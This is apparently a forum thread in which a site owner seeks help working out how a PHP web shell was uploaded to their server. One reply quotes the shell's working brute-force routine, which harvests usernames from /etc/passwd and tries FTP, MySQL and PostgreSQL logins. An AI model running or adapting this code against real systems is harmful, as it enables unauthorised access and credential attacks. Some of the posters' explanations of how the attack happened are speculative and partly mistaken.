Site Hacked With 404.php Shell - More Info?

[olimits7]

Hi,

My website was hacked using the following 404.php shell file, which I found uploaded to my site. I checked my logs and I can see that the point of entry was through http and not ftp or ssh.

http://pastebin.com/pXACCsW4

I'm new to this whole area, and I'm just trying to learn more about it and also how to protect myself better.

I see in the http log file there are a bunch of "GET" lines, but then all of suddend I can see a "POST" line show up showing the upload of the 404.php file. I'm trying to find out how exactly was this hacker able to post this file to my site.

The only entry points I can think of is I have Kayako Live Chat on my website; could this file be injected through this Live Chat feature? Or I also have a WordPress blog on my site; could this file been injected via posting comments or trackbacks on the blog?

Thank you!

[limdis]

Wow that's a lot of code. Give us some time to go over it.

[olimits7]

I ended up uploading it back to my site and changed the md5 hashed password to something else, and it basically loads a "windows explorer" type page which gives the hacker full site to the server.

I am impressed of the creator of this shell script, but upset that I had to experience the attack first hand! So this is why I'm trying to figure out what entry points or how this hacker could have gotten this file on my server to begin with.

Thanks!

[centip3de]

Hi,

My website was hacked using the following 404.php shell file, which I found uploaded to my site. I checked my logs and I can see that the point of entry was through http and not ftp or ssh.

http://pastebin.com/pXACCsW4

I'm new to this whole area, and I'm just trying to learn more about it and also how to protect myself better.

I see in the http log file there are a bunch of "GET" lines, but then all of suddend I can see a "POST" line show up showing the upload of the 404.php file. I'm trying to find out how exactly was this hacker able to post this file to my site.

The only entry points I can think of is I have Kayako Live Chat on my website; could this file be injected through this Live Chat feature? Or I also have a WordPress blog on my site; could this file been injected via posting comments or trackbacks on the blog?

Thank you!

No, I'm pretty sure your server just got brute-forced. I'm assuming that's what all the GET lines are, and why this function exists in the posted code:

Code: Select all

function actionBruteforce() {
    printHeader();
    if( isset($_POST['proto']) ) {
        echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
        if( $_POST['proto'] == 'ftp' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $fp = @ftp_connect($ip, $port?$port:21);
                if(!$fp) return false;
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif( $_POST['proto'] == 'mysql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif( $_POST['proto'] == 'pgsql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
                $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        if($_POST['type'] == 1) {
            $temp = @file('/etc/passwd');
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@$_POST['reverse']) {
                        $tmp = "";
                        for($i=strlen($line[0])-1; $i>=0; --$i)
                            $tmp .= $line[0][$i];
                        ++$attempts;
                        if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                            $success++;
                            echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        } elseif($_POST['type'] == 2) {
            $temp = @file($_POST['dict']);
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
    }
    echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
        .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
        .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
        .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
        .'<span>Server:port</span></td>'
        .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
        .'<tr><td><span>Brute type</span></td>'
        .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
        .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
        .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
        .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
        .'<td><input type=text name=login value="komsen"></td></tr>'
        .'<tr><td><span>Dictionary</span></td>'
        .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
    echo '</div><br>';
    printFooter();
}


Then once he gained access, it looks like he uploaded this script to your server, and was able to open a backdoor, of sorts (which is why 90% of that code is just normal shell commands).

[olimits7]

Thank you for your reply!

Probably mid-September, my WordPress blog site got hit hard where I noticed a bunch of trackback links being posted and comments. At that time, I had comments to "automatically" be approved. As soon as I saw this; I changed my blog settings to have each comment be approved and to stop linking to trackpacks, but I'm guessing I was to late at this point.

How exactly does a brute-force attack work, where by using "GET" they are able to upload the 404.php file to my site?

Could this be done through Kayako Live Chat or through Wordpress comments/trackback links?

Thank you, again!

[LoGiCaL__]

I think you would be better off posting the log. Just take out ip addresses or any identifying info.

[limdis]

I think you would be better off posting the log. Just take out ip addresses or any identifying info.

This. Weekend and I looked at this for a little while and what we found was interesting. But we'll need logs to confirm our suspicions.

[centip3de]

How exactly does a brute-force attack work, where by using "GET" they are able to upload the 404.php file to my site?

A brute-force attack is where someone tries every single password combination there is (from a-AAAAAAAAAAAAA), one after another. By doing this, they are able to crack your password, without knowing it. However, the downfall to this attack is that it is very, very, VERY, time consuming and takes a lot of tries (what I'm assuming all the GET requests were). The POST request could be a number of things, but I'm assuming that it's the server allowing him in. From the server, he probably downloaded his script via FTP onto your server, and there it lied.

Or, the POST command somehow enabled him to download the file onto your server via FTP (or another protocol) and he then busted in through there.

Could this be done through Kayako Live Chat or through Wordpress comments/trackback links?
Thank you, again!

No. This can only be done through something that accepts a user/pass combination, such as a login. And, because he was able to get something onto your server, I'm assuming that it was the login to your server (also most likely why there are port scanning functions in the script).

[weekend hacker]

No. This can only be done through something that accepts a user/pass combination, such as a login. And, because he was able to get something onto your server, I'm assuming that it was the login to your server (also most likely why there are port scanning functions in the script).

Although Wordpress makes it easy to update there could be some vuln plugin or some other web angle that wouldn't require a password.
And with shared hosting it you could have set bad modes on your directories allowing anyone else with an account to write to it.(really though, what kind of hosting doesn't at least pretend to prevent this?) There are so many potential ways to get in its nearly impossible to tell without those logs and more information.

As for the backdoor itself, I'm assuming that paste wasn't the one used on your machine but something you googled?
The reason I think this is because the paste ID is the exact same one as the one used in the blog post of the site mentioned in that shell. (password: HACKED)
And version 2.5 of that shell looks prettyer(and windows support/windows only?)

EDIT: by the top part I mean maybe it wasn't brute force but an actual exploit in one of the many 3rd party things you probably use.

[centip3de]

Although Wordpress makes it easy to update there could be some vuln plugin or some other web angle that wouldn't require a password.
And with shared hosting it you could have set bad modes on your directories allowing anyone else with an account to write to it.(really though, what kind of hosting doesn't at least pretend to prevent this?) There are so many potential ways to get in its nearly impossible to tell without those logs and more information.

I'd be really interested in a bruteforce attack that didn't require a user/pass combination, personally.